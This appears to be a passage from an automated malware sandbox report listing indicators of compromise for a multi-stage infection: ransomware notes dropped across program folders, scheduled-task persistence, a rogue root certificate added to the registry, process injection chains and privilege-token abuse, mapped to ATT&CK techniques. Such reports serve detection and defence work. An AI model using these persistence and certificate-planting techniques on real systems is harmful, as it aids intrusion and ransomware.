File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookWideTile.scale-150.png	ld.exe
File created	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\TCUI-Toolkit\Images\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\7-Zip\Lang\it.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.scale-400_contrast-white.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\SplashScreen.scale-100.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsMedTile.scale-125.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16\Stationery\DESIGNER.ONE	ld.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-125_contrast-black.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-16_altform-unplated_contrast-white.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-48_altform-unplated_contrast-black_devicefamily-colorfulunplated.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\WideTile.scale-125.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Dial\ColorPalette.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\THMBNAIL.PNG	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-48_altform-unplated.png	ld.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\Blog.dotx	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\SLATE.INF	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\FileForms32x32.png	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\management\jmxremote.access	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-125_contrast-white.png	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\he-il\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-phn.xrm-ms	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Grace-ul-oob.xrm-ms	ld.exe
File opened for modification	C:\Program Files\Windows Media Player\en-US\WMPMediaSharing.dll.mui	ld.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorWideTile.contrast-white_scale-125.png	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-256_altform-unplated_contrast-white.png	ld.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\vi-VN\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap	ld.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html	ld.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\he-il\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeAppList.scale-100_contrast-black.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\osf\agavedefaulticon32x32.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\notetagsUI\main.js	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Microsoft.People.NativeComponents.winmd	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\zh-CN\msipc.dll.mui	ld.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_scale-125.png	ld.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml	ld.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x86__8wekyb3d8bbwe\Microsoft.Services.Store.Engagement.winmd	ld.exe
File created	C:\Program Files\VideoLAN\VLC\locale\co\HOW TO BACK FILES.txt	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubMedTile.scale-125_contrast-white.png	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\PREVIEW.GIF	ld.exe

Drops file in Windows directory 1 IoCs

Processes:

random.exe

description ioc process

File created C:\Windows\Tasks\axplont.job random.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

9156 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\axplont.job	random.exe

pid	process
9156	sc.exe

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
7208	5948	WerFault.exe	victor.exe
8180	7680	WerFault.exe	current.exe
3584	3176	WerFault.exe	33333.exe
8904	1868	WerFault.exe	Install.exe
6508	1868	WerFault.exe	Install.exe
1432	7276	WerFault.exe	gold.exe
3196	5892	WerFault.exe	Install.exe
9104	5424	WerFault.exe	Install.exe
10120	8280	WerFault.exe	sarra.exe
5276	3268	WerFault.exe	lenin.exe
9004	6556	WerFault.exe	Install.exe
7420	6356	WerFault.exe	Install.exe
5348	6756	WerFault.exe	JpxEUBN.exe
3060	5308	WerFault.exe	bqZHxEQ.exe
4528	3712	WerFault.exe	RegAsm.exe
6940	6540	WerFault.exe	jsbbv.exe
4544	4496	WerFault.exe	ZinTask.exe
6112	8932	WerFault.exe	AddInProcess32.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\228.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\a\228.exe	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

GTA_V.tmp

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	GTA_V.tmp
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GTA_V.tmp

Creates scheduled task(s) 1 TTPs 34 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
8176	schtasks.exe
9128	schtasks.exe
7268	schtasks.exe
1500	schtasks.exe
7408	schtasks.exe
9856	schtasks.exe
6072	schtasks.exe
8028	schtasks.exe
5904	schtasks.exe
3560	schtasks.exe
6836	schtasks.exe
9064	schtasks.exe
2456	schtasks.exe
8336	schtasks.exe
8984	schtasks.exe
6888	schtasks.exe
2620	schtasks.exe
10144	schtasks.exe
6412	schtasks.exe
1140	schtasks.exe
10044	schtasks.exe
6584	schtasks.exe
8848	schtasks.exe
7612	schtasks.exe
3932	schtasks.exe
7624	schtasks.exe
7256	schtasks.exe
8388	schtasks.exe
7688	schtasks.exe
10000	schtasks.exe
8056	schtasks.exe
8344	schtasks.exe
9256	schtasks.exe
5228	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

6632 tasklist.exe

pid	process
6632	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

2504 systeminfo.exe
6920 systeminfo.exe

pid	process
2504	systeminfo.exe
6920	systeminfo.exe

GoLang User-Agent 7 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	219	Go-http-client/1.1
HTTP User-Agent header	222	Go-http-client/1.1
HTTP User-Agent header	255	Go-http-client/1.1
HTTP User-Agent header	256	Go-http-client/1.1
HTTP User-Agent header	318	Go-http-client/1.1
HTTP User-Agent header	319	Go-http-client/1.1
HTTP User-Agent header	328	Go-http-client/1.1

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

svhoost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	svhoost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	svhoost.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1096 NOTEPAD.EXE
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

8628 PING.EXE

pid	process
1096	NOTEPAD.EXE

pid	process
8628	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

powershell.exemsedge.exemsedge.exepowershell.exeCasPol.exeidentity_helper.exeld.exepowershell.exepowershell.exerandom.exelenin.exeaxplont.exe

pid	process
3784	powershell.exe
3784	powershell.exe
3784	powershell.exe
1892	msedge.exe
1892	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
5168	CasPol.exe
5168	CasPol.exe
1472	identity_helper.exe
1472	identity_helper.exe
440	ld.exe
440	ld.exe
4900	powershell.exe
4900	powershell.exe
4900	powershell.exe
7704	powershell.exe
7704	powershell.exe
7704	powershell.exe
8636	random.exe
8636	random.exe
3268	lenin.exe
3268	lenin.exe
8144	axplont.exe
8144	axplont.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exe

pid process

2984 msedge.exe
2984 msedge.exe
2984 msedge.exe
2984 msedge.exe
2984 msedge.exe
2984 msedge.exe
2984 msedge.exe
2984 msedge.exe
2984 msedge.exe

pid	process
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

New Text Document.exevolumeinfo.exepowershell.exe360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exeNew.exepowershell.exeCasPol.exe7z.exeld.exe

description	pid	process
Token: SeDebugPrivilege	228	New Text Document.exe
Token: SeDebugPrivilege	4048	volumeinfo.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeManageVolumePrivilege	3056	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
Token: SeDebugPrivilege	2904	New.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	5168	CasPol.exe
Token: SeDebugPrivilege	4048	volumeinfo.exe
Token: SeRestorePrivilege	4252	7z.exe
Token: 35	4252	7z.exe
Token: SeSecurityPrivilege	4252	7z.exe
Token: SeSecurityPrivilege	4252	7z.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeDebugPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe
Token: SeTakeOwnershipPrivilege	440	ld.exe

Suspicious use of FindShellTrayWindow 54 IoCs

Processes:

360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exemsedge.exego.exerandom.exewell.exe

pid	process
3056	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
3056	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
3056	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
8636	random.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
7436	well.exe
7436	well.exe
7436	well.exe

Suspicious use of SendNotifyMessage 52 IoCs

Processes:

360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exemsedge.exego.exewell.exe

pid	process
3056	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
3056	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
2984	msedge.exe
3056	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
1940	go.exe
7436	well.exe
7436	well.exe
7436	well.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

CasPol.exe360TS_Setup.exe360TS_Setup.exe

pid process

5168 CasPol.exe
6024 360TS_Setup.exe
5748 360TS_Setup.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document.exeZinker.exesmartsoftsignew.execmd.exemsedge.exe

description	pid	process	target process
PID 228 wrote to memory of 4048	228	New Text Document.exe	volumeinfo.exe
PID 228 wrote to memory of 4048	228	New Text Document.exe	volumeinfo.exe
PID 228 wrote to memory of 4048	228	New Text Document.exe	volumeinfo.exe
PID 228 wrote to memory of 2256	228	New Text Document.exe	Zinker.exe
PID 228 wrote to memory of 2256	228	New Text Document.exe	Zinker.exe
PID 228 wrote to memory of 2256	228	New Text Document.exe	Zinker.exe
PID 2256 wrote to memory of 1872	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 1872	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 1872	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 2256 wrote to memory of 3712	2256	Zinker.exe	RegAsm.exe
PID 228 wrote to memory of 3964	228	New Text Document.exe	smartsoftsignew.exe
PID 228 wrote to memory of 3964	228	New Text Document.exe	smartsoftsignew.exe
PID 228 wrote to memory of 3964	228	New Text Document.exe	smartsoftsignew.exe
PID 228 wrote to memory of 1564	228	New Text Document.exe	ADServices.exe
PID 228 wrote to memory of 1564	228	New Text Document.exe	ADServices.exe
PID 3964 wrote to memory of 1136	3964	smartsoftsignew.exe	cmd.exe
PID 3964 wrote to memory of 1136	3964	smartsoftsignew.exe	cmd.exe
PID 3964 wrote to memory of 1136	3964	smartsoftsignew.exe	cmd.exe
PID 1136 wrote to memory of 3784	1136	cmd.exe	powershell.exe
PID 1136 wrote to memory of 3784	1136	cmd.exe	powershell.exe
PID 1136 wrote to memory of 3784	1136	cmd.exe	powershell.exe
PID 228 wrote to memory of 2904	228	New Text Document.exe	New.exe
PID 228 wrote to memory of 2904	228	New Text Document.exe	New.exe
PID 228 wrote to memory of 3056	228	New Text Document.exe	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
PID 228 wrote to memory of 3056	228	New Text Document.exe	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
PID 228 wrote to memory of 3056	228	New Text Document.exe	360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
PID 1136 wrote to memory of 2984	1136	cmd.exe	msedge.exe
PID 1136 wrote to memory of 2984	1136	cmd.exe	msedge.exe
PID 1136 wrote to memory of 1900	1136	cmd.exe	tar.exe
PID 1136 wrote to memory of 1900	1136	cmd.exe	tar.exe
PID 1136 wrote to memory of 1900	1136	cmd.exe	tar.exe
PID 2984 wrote to memory of 976	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 976	2984	msedge.exe	msedge.exe
PID 1136 wrote to memory of 5096	1136	cmd.exe	putty.exe
PID 1136 wrote to memory of 5096	1136	cmd.exe	putty.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
PID 2984 wrote to memory of 5040	2984	msedge.exe	msedge.exe
